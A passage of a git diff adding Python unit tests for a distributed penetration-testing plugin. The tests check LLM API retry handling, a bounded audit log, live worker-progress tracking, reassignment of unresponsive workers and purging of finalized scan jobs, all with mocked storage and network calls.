{"count": 0} + + def flaky_post(*_args, **_kwargs): + calls["count"] += 1 + if calls["count"] == 1: + raise requests.exceptions.ConnectionError("temporary") + return Response() + + requests.post = flaky_post + try: + result = host._call_llm_agent_api("/analyze_scan", payload={"scan_results": {}}) + finally: + requests.post = original_post + + self.assertEqual(result["analysis"], "ok") + self.assertEqual(calls["count"], 2) + + def test_call_llm_agent_api_does_not_retry_non_retryable_provider_rejection(self): + from extensions.business.cybersec.red_mesh.mixins.llm_agent import _RedMeshLlmAgentMixin + + class MockHost(_RedMeshLlmAgentMixin): + def __init__(self): + self.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 5, "AUTO_ANALYSIS_TYPE": "security_assessment"} + self.cfg_llm_agent_api_host = "127.0.0.1" + self.cfg_llm_agent_api_port = 8080 + self.cfg_llm_api_retries = 2 + + def P(self, *_args, **_kwargs): + return None + + def Pd(self, *_args, **_kwargs): + return None + + class Response: + status_code = 500 + text = '{"detail":"DeepSeek API returned status 400"}' + + @staticmethod + def json(): + return {"detail": "DeepSeek API returned status 400"} + + host = MockHost() + original_post = requests.post + calls = {"count": 0} + + def rejected_post(*_args, **_kwargs): + calls["count"] += 1 + return Response() + + requests.post = rejected_post + try: + result = host._call_llm_agent_api("/analyze_scan", payload={"scan_results": {}}) + finally: + requests.post = original_post + + self.assertEqual(calls["count"], 1) + self.assertEqual(result["status"], "provider_request_error") + self.assertEqual(result["provider_status"], 400) + self.assertFalse(result["retryable"]) + + +class TestAuditLogHardening(unittest.TestCase): + + def test_audit_log_uses_bounded_deque(self): + mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + + plugin = PentesterApi01Plugin.__new__(PentesterApi01Plugin) + plugin._audit_log = deque(maxlen=3) + plugin.time = lambda: 123.0 + plugin.ee_addr = "0xnode" + plugin.ee_id = "node-1" + plugin.json_dumps = json.dumps + plugin.P = lambda *_args, **_kwargs: None + + for idx in range(5): + plugin._log_audit_event(f"event-{idx}", {"ordinal": idx}) + + self.assertIsInstance(plugin._audit_log, deque) + self.assertEqual(plugin._audit_log.maxlen, 3) + self.assertEqual(len(plugin._audit_log), 3) + self.assertEqual([entry["event"] for entry in plugin._audit_log], ["event-2", "event-3", "event-4"]) diff --git a/extensions/business/cybersec/red_mesh/tests/test_integration.py b/extensions/business/cybersec/red_mesh/tests/test_integration.py new file mode 100644 index 00000000..91f35c06 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_integration.py @@ -0,0 +1,1658 @@ +import json +import sys +import struct +import unittest +from unittest.mock import MagicMock, patch + +from .conftest import DummyOwner, MANUAL_RUN, PentestLocalWorker, color_print, mock_plugin_modules + + +class TestPhase12LiveProgress(unittest.TestCase): + """Phase 12: Live Worker Progress.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def test_worker_progress_model_roundtrip(self): + """WorkerProgress.from_dict(wp.to_dict()) preserves all fields.""" + from extensions.business.cybersec.red_mesh.models import WorkerProgress + wp = WorkerProgress( + job_id="job-1", + worker_addr="0xWorkerA", + pass_nr=2, + assignment_revision_seen=4, + progress=45.5, + phase="service_probes", + scan_type="network", + phase_index=3, + total_phases=5, + ports_scanned=500, + ports_total=1024, + open_ports_found=[22, 80, 443], + completed_tests=["fingerprint_completed", "service_info_completed"], + updated_at=1700000000.0, + started_at=1699999990.0, + first_seen_live_at=1699999990.0, + last_seen_at=1700000000.0, + finished=False, + live_metrics={"total_duration": 30.5}, + ) + d = wp.to_dict() + wp2 = WorkerProgress.from_dict(d) + self.assertEqual(wp2.job_id, "job-1") + self.assertEqual(wp2.worker_addr, "0xWorkerA") + self.assertEqual(wp2.pass_nr, 2) + self.assertEqual(wp2.assignment_revision_seen, 4) + self.assertAlmostEqual(wp2.progress, 45.5) + self.assertEqual(wp2.phase, "service_probes") + self.assertEqual(wp2.scan_type, "network") + self.assertEqual(wp2.phase_index, 3) + self.assertEqual(wp2.total_phases, 5) + self.assertEqual(wp2.ports_scanned, 500) + self.assertEqual(wp2.ports_total, 1024) + self.assertEqual(wp2.open_ports_found, [22, 80, 443]) + self.assertEqual(wp2.completed_tests, ["fingerprint_completed", "service_info_completed"]) + self.assertEqual(wp2.updated_at, 1700000000.0) + self.assertEqual(wp2.started_at, 1699999990.0) + self.assertEqual(wp2.first_seen_live_at, 1699999990.0) + self.assertEqual(wp2.last_seen_at, 1700000000.0) + self.assertFalse(wp2.finished) + self.assertEqual(wp2.live_metrics, {"total_duration": 30.5}) + + def test_get_job_progress_filters_by_job(self): + """get_job_progress returns only workers for the requested job.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + # Simulate two jobs' progress in the :live hset + live_data = { + "job-A:worker-1": { + "job_id": "job-A", + "worker_addr": "worker-1", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 50, + "phase": "service_probes", + "ports_scanned": 50, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + "job-A:worker-2": { + "job_id": "job-A", + "worker_addr": "worker-2", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 75, + "phase": "web_tests", + "ports_scanned": 75, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + "job-B:worker-3": {"job_id": "job-B", "progress": 30}, + } + plugin.chainstore_hgetall.return_value = live_data + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 1, + "workers": { + "worker-1": {"start_port": 1, "end_port": 100, "assignment_revision": 1}, + "worker-2": {"start_port": 101, "end_port": 200, "assignment_revision": 1}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + self.assertEqual(result["job_id"], "job-A") + self.assertEqual(result["status"], "RUNNING") + self.assertEqual(len(result["workers"]), 2) + self.assertIn("worker-1", result["workers"]) + self.assertIn("worker-2", result["workers"]) + self.assertNotIn("worker-3", result["workers"]) + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "active") + self.assertEqual(result["workers"]["worker-2"]["worker_state"], "active") + + def test_get_job_progress_empty(self): + """get_job_progress for non-existent job returns empty workers dict.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = {} + plugin.chainstore_hget.return_value = None + + result = Plugin.get_job_progress(plugin, job_id="nonexistent") + self.assertEqual(result["job_id"], "nonexistent") + self.assertIsNone(result["status"]) + self.assertEqual(result["workers"], {}) + + def test_get_job_progress_marks_unseen_assigned_worker(self): + """Assigned workers with no matching :live record are surfaced as unseen.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = {} + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 3, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 2}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["assignment_revision"], 2) + + def test_get_job_progress_ignores_live_from_old_revision(self): + """Mismatched live revision is ignored for the current assignment.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = { + "job-A:worker-1": { + "job_id": "job-A", + "worker_addr": "worker-1", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 60, + "phase": "service_probes", + "ports_scanned": 60, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 1, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 2}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["ignored_live_reason"], "revision_mismatch") + + def test_get_job_progress_ignores_live_from_old_pass(self): + """Mismatched live pass is ignored for the current assignment.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = { + "job-A:worker-1": { + "job_id": "job-A", + "worker_addr": "worker-1", + "pass_nr": 1, + "assignment_revision_seen": 2, + "progress": 60, + "phase": "service_probes", + "ports_scanned": 60, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 2, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 2}, + }, + } + plugin.time.return_value = 100.0 + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["ignored_live_reason"], "pass_mismatch") + + def test_get_job_progress_ignores_malformed_live_payload(self): + """Malformed live rows are ignored instead of crashing reconciliation.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.chainstore_hgetall.return_value = { + "job-A:worker-1": { + "job_id": "job-A", + "pass_nr": 2, + }, + } + plugin.chainstore_hget.return_value = { + "job_id": "job-A", + "job_status": "RUNNING", + "job_pass": 2, + "workers": { + "worker-1": {"start_port": 1, "end_port": 10, "assignment_revision": 1}, + }, + } + plugin.time.return_value = 100.0 + plugin.P = MagicMock() + + result = Plugin.get_job_progress(plugin, job_id="job-A") + + self.assertEqual(result["workers"]["worker-1"]["worker_state"], "unseen") + self.assertEqual(result["workers"]["worker-1"]["ignored_live_reason"], "malformed_live") + plugin.P.assert_called() + + def test_publish_live_progress(self): + """_publish_live_progress writes stage-based progress to CStore :live hset.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + + # Mock a local worker with state (port scan partial + fingerprint done) + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(100)), + "open_ports": [22, 80], + "completed_tests": ["fingerprint_completed"], + "done": False, + } + worker.initial_ports = list(range(1, 513)) + + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + + # Mock CStore lookup for pass_nr + plugin.chainstore_hget.return_value = {"job_pass": 3} + + Plugin._publish_live_progress(plugin) + + # Verify hset was called with correct key pattern + plugin.chainstore_hset.assert_called_once() + call_args = plugin.chainstore_hset.call_args + self.assertEqual(call_args.kwargs["hkey"], "test-instance:live") + self.assertEqual(call_args.kwargs["key"], "job-1:node-A") + progress_data = call_args.kwargs["value"] + self.assertEqual(progress_data["job_id"], "job-1") + self.assertEqual(progress_data["worker_addr"], "node-A") + self.assertEqual(progress_data["pass_nr"], 3) + self.assertEqual(progress_data["assignment_revision_seen"], 1) + self.assertEqual(progress_data["phase"], "service_probes") + self.assertEqual(progress_data["scan_type"], "network") + self.assertEqual(progress_data["phase_index"], 3) + self.assertEqual(progress_data["total_phases"], 5) + self.assertEqual(progress_data["ports_scanned"], 100) + self.assertEqual(progress_data["ports_total"], 512) + self.assertIn(22, progress_data["open_ports_found"]) + self.assertIn(80, progress_data["open_ports_found"]) + self.assertEqual(progress_data["started_at"], 100.0) + self.assertEqual(progress_data["first_seen_live_at"], 100.0) + self.assertEqual(progress_data["last_seen_at"], 100.0) + self.assertFalse(progress_data["finished"]) + # Stage-based progress: service_probes = stage 3 (idx 2), so 2/5*100 = 40% + self.assertEqual(progress_data["progress"], 40.0) + # Single thread — no threads field + self.assertNotIn("threads", progress_data) + + def test_publish_live_progress_missing_interval_uses_default(self): + """Missing publish interval falls back to the default safely.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + plugin._progress_publish_interval = None + plugin.cfg_progress_publish_interval = None + plugin.CONFIG = {"PROGRESS_PUBLISH_INTERVAL": 30} + + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(10)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker.initial_ports = list(range(1, 33)) + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + self.assertEqual(Plugin._get_progress_publish_interval(plugin), 30.0) + plugin.chainstore_hset.assert_called_once() + + def test_publish_live_progress_invalid_interval_uses_default(self): + """Malformed publish interval falls back to the default safely.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 80 + plugin.time.return_value = 100.0 + plugin._progress_publish_interval = None + plugin.cfg_progress_publish_interval = "invalid" + plugin.CONFIG = {"PROGRESS_PUBLISH_INTERVAL": 30} + + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(10)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker.initial_ports = list(range(1, 33)) + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + self.assertEqual(Plugin._get_progress_publish_interval(plugin), 30.0) + plugin.chainstore_hset.assert_not_called() + + def test_publish_live_progress_zero_interval_uses_default(self): + """Zero publish interval falls back to the default instead of tight-looping.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 80 + plugin.time.return_value = 100.0 + plugin._progress_publish_interval = None + plugin.cfg_progress_publish_interval = 0 + plugin.CONFIG = {"PROGRESS_PUBLISH_INTERVAL": 30} + + worker = MagicMock() + worker.state = { + "ports_scanned": list(range(10)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker.initial_ports = list(range(1, 33)) + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + self.assertEqual(Plugin._get_progress_publish_interval(plugin), 30.0) + plugin.chainstore_hset.assert_not_called() + + def test_job_write_guarantees_are_detection_only(self): + """Mutable job writes explicitly advertise detection-only semantics.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + + self.assertFalse(Plugin._supports_guarded_job_writes(plugin)) + self.assertEqual(Plugin._get_job_write_guarantees(plugin)["mode"], "detection_only") + self.assertFalse(Plugin._get_job_write_guarantees(plugin)["guarded_writes"]) + + def test_publish_live_progress_multi_thread_phase(self): + """Phase is the earliest active phase; per-thread data is included.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + + # Thread 1: fully done + worker1 = MagicMock() + worker1.state = { + "ports_scanned": list(range(256)), + "open_ports": [22], + "completed_tests": ["fingerprint_completed", "service_info_completed", "web_tests_completed", "correlation_completed"], + "done": True, + } + worker1.initial_ports = list(range(1, 257)) + + # Thread 2: still on port scan (50 of 256 ports) + worker2 = MagicMock() + worker2.state = { + "ports_scanned": list(range(50)), + "open_ports": [], + "completed_tests": [], + "done": False, + } + worker2.initial_ports = list(range(257, 513)) + + plugin.scan_jobs = {"job-1": {"t1": worker1, "t2": worker2}} + plugin.chainstore_hget.return_value = {"job_pass": 1} + + Plugin._publish_live_progress(plugin) + + call_args = plugin.chainstore_hset.call_args + progress_data = call_args.kwargs["value"] + # Phase should be port_scan (earliest across threads), not done + self.assertEqual(progress_data["phase"], "port_scan") + # Stage-based: port_scan (idx 0) + sub-progress (306/512 * 20%) = ~12% + self.assertGreater(progress_data["progress"], 10) + self.assertLess(progress_data["progress"], 15) + # Per-thread data should be present (2 threads) + self.assertIn("threads", progress_data) + self.assertEqual(progress_data["threads"]["t1"]["phase"], "done") + self.assertEqual(progress_data["threads"]["t2"]["phase"], "port_scan") + self.assertEqual(progress_data["threads"]["t2"]["ports_scanned"], 50) + self.assertEqual(progress_data["threads"]["t2"]["ports_total"], 256) + + def test_publish_live_progress_webapp_phase_metadata(self): + """Graybox live progress publishes explicit scan_type and phase metadata.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + plugin._last_progress_publish = 0 + plugin.time.return_value = 100.0 + + worker = MagicMock() + worker.state = { + "scan_type": "webapp", + "ports_scanned": [443], + "open_ports": [443], + "completed_tests": ["graybox_auth", "graybox_discovery"], + "done": False, + } + worker.initial_ports = [443] + + plugin.scan_jobs = {"job-1": {"worker-thread-1": worker}} + plugin.chainstore_hget.return_value = {"job_pass": 2} + + Plugin._publish_live_progress(plugin) + + progress_data = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(progress_data["scan_type"], "webapp") + self.assertEqual(progress_data["phase"], "graybox_probes") + self.assertEqual(progress_data["phase_index"], 4) + self.assertEqual(progress_data["total_phases"], 5) + + def test_maybe_launch_jobs_publishes_worker_startup_live_progress(self): + """Assigned worker launch writes an immediate startup record to :live.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.cfg_check_jobs_each = 15 + plugin.ee_addr = "node-A" + plugin.scan_jobs = {} + plugin.completed_jobs_reports = {} + plugin.lst_completed_jobs = [] + plugin._active_execution_identities = {} + plugin._execution_live_meta = {} + plugin._foreign_jobs_logged = set() + plugin._PentesterApi01Plugin__last_checked_jobs = 0 + plugin.time.side_effect = [100.0, 100.0, 100.0] + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin._get_job_config.return_value = {"scan_type": "network"} + plugin.P = MagicMock() + plugin._get_worker_entry = lambda job_id, spec: Plugin._get_worker_entry(plugin, job_id, spec) + plugin._remember_execution_identity = lambda job_id, identity, started_at: Plugin._remember_execution_identity( + plugin, job_id, identity, started_at + ) + plugin._publish_worker_startup_progress = lambda job_id, job_specs, local_jobs, assignment_revision, started_at: ( + Plugin._publish_worker_startup_progress( + plugin, + job_id, + job_specs, + local_jobs, + assignment_revision, + started_at, + ) + ) + + job_specs = { + "job_id": "job-1", + "target": "10.0.0.1", + "job_pass": 2, + "launcher": "node-launcher", + "launcher_alias": "rm1", + "workers": { + "node-A": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 2, + }, + }, + } + plugin.chainstore_hgetall.return_value = {"job-1": job_specs} + + worker = MagicMock() + worker.state = {"scan_type": "network"} + worker.initial_ports = list(range(1, 101)) + local_jobs = {"local-1": worker} + + with patch("extensions.business.cybersec.red_mesh.pentester_api_01.launch_local_jobs", return_value=local_jobs): + Plugin._maybe_launch_jobs(plugin) + + self.assertEqual(plugin.scan_jobs["job-1"], local_jobs) + startup_progress = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(startup_progress["job_id"], "job-1") + self.assertEqual(startup_progress["pass_nr"], 2) + self.assertEqual(startup_progress["assignment_revision_seen"], 2) + self.assertEqual(startup_progress["phase"], "port_scan") + self.assertEqual(startup_progress["started_at"], 100.0) + self.assertEqual(plugin._active_execution_identities["job-1"], ("job-1", 2, "node-A", 2)) + + def test_maybe_launch_jobs_skips_duplicate_execution_identity(self): + """A repeated announce of the same execution identity does not relaunch.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.cfg_check_jobs_each = 15 + plugin.ee_addr = "node-A" + plugin.scan_jobs = {"job-1": {"local-1": MagicMock()}} + plugin.completed_jobs_reports = {} + plugin.lst_completed_jobs = [] + plugin._active_execution_identities = {"job-1": ("job-1", 2, "node-A", 2)} + plugin._execution_live_meta = { + "job-1": { + "pass_nr": 2, + "assignment_revision_seen": 2, + "started_at": 95.0, + "first_seen_live_at": 95.0, + }, + } + plugin._foreign_jobs_logged = set() + plugin._PentesterApi01Plugin__last_checked_jobs = 0 + plugin.time.return_value = 100.0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._get_worker_entry = lambda job_id, spec: Plugin._get_worker_entry(plugin, job_id, spec) + + job_specs = { + "job_id": "job-1", + "target": "10.0.0.1", + "job_pass": 2, + "launcher": "node-launcher", + "launcher_alias": "rm1", + "workers": { + "node-A": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 2, + }, + }, + } + plugin.chainstore_hgetall.return_value = {"job-1": job_specs} + + with patch("extensions.business.cybersec.red_mesh.pentester_api_01.launch_local_jobs") as mocked_launch: + Plugin._maybe_launch_jobs(plugin) + + mocked_launch.assert_not_called() + + def test_maybe_reannounce_worker_assignments_retries_unseen_worker_only(self): + """Launcher bumps only the missing worker assignment revision.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_check_jobs_each = 15 + plugin.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 30, + "STALE_GRACE": 20, + "MAX_REANNOUNCE_ATTEMPTS": 3, + } + plugin._last_worker_reconcile_check = 0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.time.return_value = 100.0 + + job_specs = { + "job_id": "job-1", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "launcher_alias": "rm1", + "target": "10.0.0.1", + "start_port": 1, + "end_port": 200, + "date_created": 10.0, + "job_config_cid": "QmConfig", + "workers": { + "worker-B": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 1, + "assigned_at": 10.0, + }, + "worker-C": { + "start_port": 101, + "end_port": 200, + "assignment_revision": 1, + "assigned_at": 10.0, + }, + }, + "timeline": [], + "pass_reports": [], + "job_revision": 0, + } + live_payloads = { + "job-1:worker-B": { + "job_id": "job-1", + "worker_addr": "worker-B", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 25.0, + "phase": "service_probes", + "ports_scanned": 25, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 20.0, + "first_seen_live_at": 20.0, + "last_seen_at": 100.0, + }, + } + + def _hgetall(*, hkey): + if hkey == "test-instance": + return {"job-1": dict(job_specs)} + if hkey == "test-instance:live": + return dict(live_payloads) + return {} + + plugin.chainstore_hgetall.side_effect = _hgetall + plugin.chainstore_hget.return_value = dict(job_specs) + + Plugin._maybe_reannounce_worker_assignments(plugin) + + persisted = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(persisted["workers"]["worker-B"]["assignment_revision"], 1) + self.assertEqual(persisted["workers"]["worker-C"]["assignment_revision"], 2) + self.assertEqual(persisted["workers"]["worker-C"]["reannounce_count"], 1) + self.assertEqual(persisted["workers"]["worker-C"]["retry_reason"], "startup_timeout") + self.assertEqual(persisted["timeline"][-1]["type"], "worker_reannounced") + + def test_maybe_reannounce_worker_assignments_retries_stale_worker(self): + """Launcher retries a matched worker whose live state is stale past grace.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_check_jobs_each = 15 + plugin.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 30, + "STALE_TIMEOUT": 10, + "STALE_GRACE": 20, + "MAX_REANNOUNCE_ATTEMPTS": 3, + } + plugin._last_worker_reconcile_check = 0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.time.return_value = 100.0 + + job_specs = { + "job_id": "job-2", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "launcher_alias": "rm1", + "target": "10.0.0.2", + "start_port": 1, + "end_port": 100, + "date_created": 10.0, + "job_config_cid": "QmConfig", + "workers": { + "worker-C": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 1, + "assigned_at": 10.0, + }, + }, + "timeline": [], + "pass_reports": [], + "job_revision": 0, + } + live_payloads = { + "job-2:worker-C": { + "job_id": "job-2", + "worker_addr": "worker-C", + "pass_nr": 1, + "assignment_revision_seen": 1, + "progress": 10.0, + "phase": "service_probes", + "ports_scanned": 10, + "ports_total": 100, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 60.0, + "started_at": 20.0, + "first_seen_live_at": 20.0, + "last_seen_at": 60.0, + }, + } + + def _hgetall(*, hkey): + if hkey == "test-instance": + return {"job-2": dict(job_specs)} + if hkey == "test-instance:live": + return dict(live_payloads) + return {} + + plugin.chainstore_hgetall.side_effect = _hgetall + plugin.chainstore_hget.return_value = dict(job_specs) + + Plugin._maybe_reannounce_worker_assignments(plugin) + + persisted = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(persisted["workers"]["worker-C"]["assignment_revision"], 2) + self.assertEqual(persisted["workers"]["worker-C"]["retry_reason"], "stale_live") + self.assertEqual(persisted["timeline"][-1]["type"], "worker_reannounced") + + def test_maybe_reannounce_worker_assignments_stops_job_after_retry_exhaustion(self): + """Launcher stops the job explicitly once a worker exhausts re-announcement budget.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-launcher" + plugin.cfg_check_jobs_each = 15 + plugin.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 30, + "STALE_GRACE": 20, + "MAX_REANNOUNCE_ATTEMPTS": 3, + } + plugin._last_worker_reconcile_check = 0 + plugin._normalize_job_record.side_effect = lambda job_id, payload, migrate=True: (job_id, payload) + plugin.P = MagicMock() + plugin._log_audit_event = MagicMock() + plugin.time.side_effect = [100.0, 100.0, 100.0] + + job_specs = { + "job_id": "job-3", + "job_status": "RUNNING", + "job_pass": 1, + "run_mode": "SINGLEPASS", + "launcher": "node-launcher", + "launcher_alias": "rm1", + "target": "10.0.0.3", + "start_port": 1, + "end_port": 100, + "date_created": 10.0, + "job_config_cid": "QmConfig", + "workers": { + "worker-C": { + "start_port": 1, + "end_port": 100, + "assignment_revision": 4, + "assigned_at": 10.0, + "reannounce_count": 3, + }, + }, + "timeline": [], + "pass_reports": [], + "job_revision": 0, + } + + def _hgetall(*, hkey): + if hkey == "test-instance": + return {"job-3": dict(job_specs)} + if hkey == "test-instance:live": + return {} + return {} + + plugin.chainstore_hgetall.side_effect = _hgetall + plugin.chainstore_hget.return_value = dict(job_specs) + + Plugin._maybe_reannounce_worker_assignments(plugin) + + persisted = plugin.chainstore_hset.call_args.kwargs["value"] + self.assertEqual(persisted["job_status"], "STOPPED") + self.assertEqual(persisted["workers"]["worker-C"]["terminal_reason"], "unreachable") + self.assertEqual(persisted["workers"]["worker-C"]["retry_reason"], "startup_timeout") + self.assertIn("worker-C", persisted["workers"]["worker-C"]["error"]) + + def test_clear_live_progress(self): + """_clear_live_progress deletes progress keys for all workers.""" + Plugin = self._get_plugin_class() + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + + Plugin._clear_live_progress(plugin, "job-1", ["worker-A", "worker-B"]) + + self.assertEqual(plugin.chainstore_hset.call_count, 2) + calls = plugin.chainstore_hset.call_args_list + keys_deleted = {c.kwargs["key"] for c in calls} + self.assertEqual(keys_deleted, {"job-1:worker-A", "job-1:worker-B"}) + for c in calls: + self.assertIsNone(c.kwargs["value"]) + + + +class TestPhase14Purge(unittest.TestCase): + """Phase 14: Job Deletion & Purge.""" + + @classmethod + def _mock_plugin_modules(cls): + if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: + return + mock_plugin_modules() + + def _get_plugin_class(self): + self._mock_plugin_modules() + from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin + return PentesterApi01Plugin + + def _make_plugin(self): + plugin = MagicMock() + plugin.cfg_instance_id = "test-instance" + plugin.ee_addr = "node-A" + return plugin + + def test_purge_finalized_collects_all_cids(self): + """Finalized purge collects archive + config + aggregated_report + worker report CIDs.""" + Plugin = self._get_plugin_class() + plugin = self._make_plugin() + + # CStore stub for a finalized job + job_specs = { + "job_id": "job-1", + "job_status": "FINALIZED", + "job_cid": "cid-archive", + "job_config_cid": "cid-config", + } + plugin.chainstore_hget.return_value = job_specs + + # Archive contains nested CIDs + archive = { + "passes": [ + { + "aggregated_report_cid": "cid-agg-1", + "worker_reports": { + "worker-A": {"report_cid": "cid-wr-A"}, + "worker-B": {"report_cid": "cid-wr-B"}, + }, + }, + ], + } + plugin.r1fs.get_json.return_value = archive + plugin.r1fs.delete_file.return_value = True + plugin.chainstore_hgetall.side_effect = [ + {}, + {"job-1:f-1": {"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk"}}, + {"job-1:f-1": [{"job_id": "job-1", "finding_id": "f-1", "status": "accepted_risk", "timestamp": 1.0}]}, + ] + + 